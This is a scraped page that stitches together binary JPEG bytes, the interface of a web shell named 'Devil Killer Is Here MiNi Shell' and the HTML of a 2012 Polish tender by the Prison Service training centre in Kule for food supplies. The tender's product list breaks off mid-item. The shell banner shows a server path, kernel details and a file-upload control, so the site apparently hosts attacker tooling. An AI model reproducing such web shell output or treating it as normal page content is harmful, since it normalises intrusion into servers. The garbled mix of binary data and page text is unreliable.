JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120113/14173-N-2012.html

<p class="kh_header"><b>Popów: Dotawa artykułów spożywczych.</b><br>
<b>Numer ogłoszenia: 14173 - 2012; data zamieszczenia: 13.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dotawa artykułów spożywczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy na potrzeby Ośrodka Szkolenia Służby Więziennej w Kulach artykuły spożywcze. Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę zadań. - zadania od 1 -3. Zadanie nr 1 dostawy produktów zbożowych, zadanie nr 2 dostawy innych artykułów spożywczych, zadanie nr 3 dostawy warzyw i owoców przetworzonych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada uprawnienia do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada wiedzę i doświadczenie do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada osoby zdolne do wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy, którego wzór stanowi załączik do SIWZ
2.Wypełniony i podpisany formularz cenowy, którego wzór stanowi załączik do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego Ośrodek Szkolenia Służby Więziennej w Kulach, Kule 2, 42-110 Popów, pokój nr 3 Dział Kwatermistrzowski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 11:00, miejsce: W siedzibie Zamawiającego 
Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2, 42-110 Popów
Pokój nr 3 sekretariat (pawilon Liswarta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy produktów zbożowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> p>
	1. Bułka tarta 15894000-1 Bułka tarta o barwie jasnej, sypka, bez grudek, powstała ze starcia bułki pszennej wraz ze sk&oacute;rką, nadająca się do panierek, bez skłonności do przypalania się. Zapach swoisty bez obcych zapach&oacute;w. Smak charakterystyczny dla suszonego pieczywa pszennego, bez obcych posmak&oacute;w. Surowiec krajowy. Op. jedn. 400- 500g PN-A-74113 kg 260 2. Kasza jęczmienna 15613100-9 Kasza jęczmienna średnia. Op. jedn. 1 kg PN-87/A-74203 kg 200 3. Kasza manna 15613100-9 Barwa biała z odcieniem ż&oacute;łtym. Zapach swoisty. Op. jedn. 1 kg PN-88/A-74036 kg 100 4. Makaron gruby 15851110-2 Makaron jajeczny ( kolanka, świderki, muszelki, rurki ). Makaron typu &bdquo;Lubella&rdquo; lub &bdquo;Malma&rdquo; lub r&oacute;wnoważne Produkowany z świeżych jaj i najwyższej jakości mąki , dzięki kt&oacute;rej makaron jest odpowiednio twardy i doskonale sprężysty, a dzięki odpowiedniemu procesowi suszenia nie skleja się i zachowuje naturalny zapach, złocisty kolor . Op. jedn. 250-500g. PN-A-74131 kg 250 5 Makaron nitki 15851110-2 Makaron jajeczny nitki. Skład: mąka pszenna, świeże jaja, woda, . Zawartość tłuszczu nie mniej niż 1,6 %. Typu &bdquo;Wręczycki&rdquo; lub r&oacute;wnoważne . Op. jedn. 250-500g PN-A-74131 kg 100 6. Mąka pszenna 15612100-2 Mąka Poznańska lub r&oacute;wnoważne Typ 500. Gluten nie mniej niż 27 % Op. jedn. 1 kg PN-A-74022 kg 500 7. Mąka ziemniaczana 15310000-4 Skrobia ziemniaczana &bdquo; superior&rdquo;. Op. jedn. 1 kg PN-93/A-74710 kg 120 8. Płatki czekoladowe 15894000-1 Zbożowe muszelki o smaku czekoladowym. Skład: mąka pszenna nie mniej niż 62 %, cukier, glukoza, kakao, tłuszcz palmowy. Op. Jedn. 250-300g PN-A-74205:1997 kg 40 9. Płatki kukurydziane 15894000-1 Płatki kukurydziane. Skład: mąka kukurydziana nie mniej niż 91,7% Op. jedn. 250-300g. PN-A-74205:1997 kg 60 10. Płatki z miodem 15894000-1 Pierścionki miodowe. Skład: mąka owsiana, mąka kukurydziana, mąka pszenna, skrobia kukurydziana, cukier, s&oacute;l, mleko w proszku, mi&oacute;d. PN-A-74205:1997 kg 40 11. Ryż biały 15611000-4 Ryż długoziarnisty. Op. Jedn. 1 kg PN-A-74220 kg 300 12. Groch poł&oacute;wki 15331133-8 Op.jedn.400g; PN-73/A-74600 kg 150 13. Fasola biała &bdquo;Jaś&rsquo;&rsquo; 15331131-4 Surowiec krajowy. Op. jedn. 400g; PN-75/R-65031 kg 150 14. Kasza gryczana 15613100-9 Nasiona gryki. Surowiec krajowy. Op. jedn. 400g . PN-76/A74204 kg 100 15. Makaron lasagne 15851230-9 Płatki makaronu Lasagne nie wymagające gotowania. Op. jedn. 250g kg 70 16. Zacierki 15851120-5 Makaron jajeczny zacierka. Skład: mąka pszenna, woda, jaja nie mniej niż 9% (2 jaja /1 kg mąki). Op. jedn. 250 -500g PN-A-74131 kg 40 17. Groszek ptysiowy 15871200-6 Op. jedn. 1 kg Groszek ptysiowy Składniki: mąka pszenna, tłuszcz roślinny, s&oacute;l, jaja w proszku, mleko odtłuszczone w proszku, drożdże. kg 30 18. Grzanki 15894000-1 Op. jedn. 05-1kg. Grzanki ziołowo-czosnkowe. Składniki: chleb pszenny ( mąka pszenna, tłuszcz roślinny,s&oacute;l, drożdże), tłuszcz roślinny, aromaty kg 30 19. Makaron ryżowy 15851100-9 Makaron ryżowy wyprodukowany z ryżu o podłużnym kształcie tuby z ukośnymi końcami. Op.250-500g Skład: mąka ryżowa; PN-A-74131. kg 40 20. Płatki &ndash; musli 15894000-1 Płatki zbożowe połączone z dużymi kawałkami owoc&oacute;w, nie zawierające sztucznych konserwant&oacute;w i barwnik&oacute;w. Op. jedn. 250-300g. kg 20</p>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy innych artykułów spożywczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <p>
	1. Herbata expresowa 15863000-5 Herbata expresowa &ndash; torebki w kopertkach i ze sznureczkiem Typu &bdquo;Lipton&rdquo; , &bdquo;Dilma&rdquo; lub r&oacute;wnoważne . Op. Podst.2g Op. Zbiorcze 50g, 100g, 200g. kg 130 2. Nap&oacute;j kakaowy 15841000-5 Kakao rozpuszczalne o mocno czekoladowym smaku z witaminami i składnikami mineralnymi. Op.jedn.300g. PN-A 88113 kg 20 3. Kawa naturalna 15861000-1 Kawa naturalna 100% pakowana pr&oacute;żniowo, mielona. Op. jedn. 250g PN93/A-76100 kg 15 4. Kawa rozpuszczalna 15861000-1 Kawa rozpuszczalna naturalna 100%, aglomerowana. Op. jedn.100g, 50g, Typu &ldquo;Tchibo Family classic&rdquo; lub r&oacute;wnoważna ; PN-93/A-76100 kg 35 5. Ketchup 15871230-5 Ketchup o smaku łagodnym. Op. jedn. 400-500g. Skład: koncentrat pomidorowy nie mniej niż 37%, woda, cukier, ocet, skrobia modyfikowana, s&oacute;l, Typu &bdquo;Tortex&rdquo; lub r&oacute;wnoważny . PN-A-86951 kg 260 6. Cukier 15831200-4 Cukier biały. Op. jedn. 1 kg ;PN-A-74850 kg 1500 7. Mi&oacute;d 15831600-8 Mi&oacute;d pszczeli nektarowy wielokwiatowy NK. Op.jedn.25g kg 250 8. Krem o smaku czekoladowym 15894000-1 Krem o smaku czekoladowym z kawałkami orzech&oacute;w &bdquo;nutella&rdquo; lub r&oacute;wnoważny. Skład: cukier, olej roślinny, orzechy laskowe nie mniej niż 13%, odtłuszczone słone 7,4%, odtłuszczone mleko w proszku . Op jedn. 200-250g. kg 250 9. Majonez dekoracyjny 15871273-8 Majonez dekoracyjny. Składniki: olej roślinny, ż&oacute;łtko jaja nie mniej niż 6,0%, ocet, musztarda (woda, gorczyca, ocet, s&oacute;l, cukier). Typu &bdquo; Winiary&rdquo; Op. jedn. 400-500ml, PN-A 86950 l 300 10. Orzechy włoskie łuskane 15842400-6 Surowiec krajowy Op. jedn. 100g PN-A-78601 kg 20 11. Żurek w płynie 15891100-2 Op. jedn. butelka 0,5 l l 160 12. Ocet winny 15871120-1 Ocet winny z białego wina o kwasowości nie mniej niż 5%.Op jedn. Butelka 200-750ml. l 5 13. Musztarda delikatesowa stołowa 15871250-1 Op.jedn.180-250g. Masa netto nie mniej niż 175 g. Skład: woda, gorczyca, ocet, s&oacute;l; PN-A-86964;2002 kg 160 14. Olej roślinny popularny 15411100-3 Olej słonecznikowy zastosowania: do smażenia, pieczenia, sos&oacute;w, sałatek, sur&oacute;wek. Skład: Mieszanka słonecznik&oacute;w olej&oacute;w słonecznik: słonecznikowy oraz sojowego i/lub słonecznikowego. Op. jedn. 0,9 &ndash; 1 l l 500 15. Oliwa z oliwek 15421130-1 Op. jedn. 05 &ndash; 1 l l 20 16. Śliwki suszone kalifornijskie 15332410-1 Śliwki suszone bez pestek p&oacute;łsuche konserwowane kwasem sorbowym. Op jedn 150 &ndash; 500g PN-A-75201 kg 25 17. Rodzynki 15332510-1 Zdrowe, całe, nieuszkodzone, owalne, spłaszczone jagody o pomarszczonej powierzchni, średniej wielkości o brązowej barwie, właściwym zapachu charakterystycznym dla suszonych winogron bez zapach&oacute;w obcych. Smak słodki, z charakterystycznym posmakiem, bez posmak&oacute;w zgorzknienia, fermentacji i innych obcych. Typu &bdquo;Kr&oacute;lewskie&rdquo; lub r&oacute;wnoważne . Masa netto 150g. PN-A-75201 kg 20 18. Wafelek w czekoladzie 15820000-2 Wafelek w czekoladzie &bdquo;Prince-Polo&rdquo; lub r&oacute;wnoważny w op.20-25g; PN-A-88114:1999 szt 3500 19. Czekolada mleczna 15842100-3 Op. jedn. 100g. Skład: cukier, tłuszcz kakaowy, miazga kakaowa, mleko w proszku pełne, mleko w proszku odtłuszczone, serwatka w proszku, tłuszcz roślinny, PN-A-88114:1999 szt 2000 20. Paluszki solone 15820000-2 Paluszki solone w op.70g; PN-A-88109:1998 szt 50 21. Czekolada do fontann 15842100-3 Czekolada mleczna Callebaut. Masa kakaowa nie mniej niż 37 % cukier, tłuszcz kakaowy, mleko pełne w proszku, miazga kakaowe, emulgator: lecytyna sojowa, aromat naturalny wanilia. Op. jedn. do 2,5 kg kg 10</p>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.86.30.00-5, 15.84.10.00-5, 15.86.10.00-1, 15.87.12.30-5, 15.83.12.00-4, 15.83.16.00-8, 15.89.40.00-1, 15.87.12.73-8, 15.84.24.00-6, 15.89.11.00-2, 15.87.11.20-1, 15.87.12.50-1, 15.41.11.00-3, 15.42.11.39-1, 15.33.24.10-1, 15.33.25.10-1, 15.82.00.00-2, 15.84.21.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy warzyw i owoców przetworzonych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> p>
	1. Ananas w syropie 15332100-5 Ananas plastry w lekkim syropie. Skład: ananas, woda, cukier. Op. jedn. 560-600g. Zawart. po odcieku nie mniej niż 340g. PN-A-77610 kg 150 2. Brzoskwinie w syropie 15332100-5 Brzoskwinie w lekkim syropie. Skład: brzoskwinie, woda, syrop glukozowo- fruktozowy, cukier, . Op. jedn. 800-900g , po odcieku nie mniej niż 470g. PN-A-77610 kg 60 3. Groszek konserwowy 15331462-3 Groch konserwowy zielony. Skład: woda, groch suchy,s&oacute;l. Op jedn 400 &ndash; 410 g. Po odcieku nie mniej niż 200g. Typu &bdquo;Pudliszki&rdquo; . PN-76/A-77803 kg 200 4. Koncentrat buraczany 15331110-1 Koncentrat barszczu czerwonego . Skład: woda, zagęszczony sok z burak&oacute;w ćwikłowych nie mniej niż 12%, cukier, s&oacute;l, przyprawy. Produkt pasteryzowany. Op jedn 330 - 400ml. l 20 5. Koncentrat pomidorowy 15331427-6 Koncentrat pomid.30% wyprodukowany ze świeżych pomidor&oacute;w, bez żadnych dodatk&oacute;w, bez konserwant&oacute;w. Typu &bdquo;Pudliszki&rdquo;, &bdquo;Dawtona&rdquo; lub r&oacute;wnoważny. Za r&oacute;wnoważny uważa się koncentrat gęsty nie zmieniający swojej barwy i smaku . Op. jedn 180-500g. PN-A- 77807 kg 250 6. Kukurydza konserwowa 15331470-2 Kukurydza konserwowa typu &bdquo;Pudliszk lub r&oacute;wnoważny i. Skład: kukurydza &ndash; ziarno, woda, cukier, s&oacute;l. Op jedn. 400-500g, po odcieku nie mniej niż 220g. PN-A-77807 kg 180 7. Og&oacute;rek kiszony 15331470-2 Op. jedn. folia 400-1200g, po odcieku nie mniej niż 850g. Skład: og&oacute;rki, naturalna zalewa, przyprawy PN 72/A-77701. kg 700 8. Og&oacute;rek konserwowy 15331500-2 Skład: og&oacute;rki, woda, ocet spirytusowy, cukier, s&oacute;l, przyprawy aromatyczno &ndash; smakowe. Op. jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g PN/A-77801. kg 700 9. Papryka konserwowa 15331136-9 Skład: Papryka słodka, zalewa octowa, przyprawy. Op jedn. 900ml. Masa netto 870g. Po odcieku nie mniej niż 350g. PN-A-77806 kg 500 10. Pieczarki marynowane 15331500-2 Skład: pieczarki całe, cebula, marchew, woda, ocet, cukier, s&oacute;l, przyprawy smakowe . Produkt pasteryzowany. Op jedn 880g. Masa po odcieku 550g. PN-A-78503 kg 20 11. Seler konserwowy łagodny 15331110-1 Seler typu &bdquo;Wyborny&rdquo; lub r&oacute;wnoważny . Sał. warzywna. Skład: seler, woda, ocet, cukier, s&oacute;l. Op. jedn. 370 ml. Masa netto 320g, po odcieku nie mniej niż 160g. PN-A-77750. kg 150 12. Dżem niskosłodzony 15332290-3 Dżem o r&oacute;żnych smakach, z kawałkami owoc&oacute;w, Skład: owoce, cukier, substancja żelująca. Łączna zawartość cukru: nie mniej niż 36g na 100g produktu. Op. jedn. 300-400g PN-A-86964 kg 100 13. Dżem wysokosłodzony 15332290-3 Op. jedn. 25 g Skład: cukier, syrop glukozowy, owoce, substancja zagęszczająca, Otrzymane z 35g owoc&oacute;w na 100g wyrobu gotowego. Łączna zawartość cukru nie mniej niż 63g na 100g wyrobu gotowego. PN-A-77609 kg 270 14. Żurawina do mięsa 15300000-1 Żurawina do mięs i ser&oacute;w niskosłodzona typu &rdquo;Łowicz&rdquo; lub r&oacute;wnoważna. Skład: owoce żurawiny, cukier, substancja żelująca. Łączna zawartość cukru nie mniej niż 44g cukru na 100g produktu. Op. jedn. 250-300g. kg 30 15. Kapusta kiszona 15331461-6 Op. jedn. folia 900-1100g. Skład: kapusta, marchew, przyprawy. Po odcieku nie mniej niż 850g. PN-72/A 77700 kg 1000 16. Chrzan tarty 15331461-6 Skład: korzeń chrzanu nie mniej niż 51%, woda, proszek jajeczny, mleko w proszku, olej roślinny, ocet spirytusowy, cukier, s&oacute;l, Op. jedn. 180g. Typu &bdquo;Łowicki&rdquo; lub r&oacute;wnoważny. PN-A77806 kg 35 17. Fasola konserwowa czerwona 15331461-6 Skład: 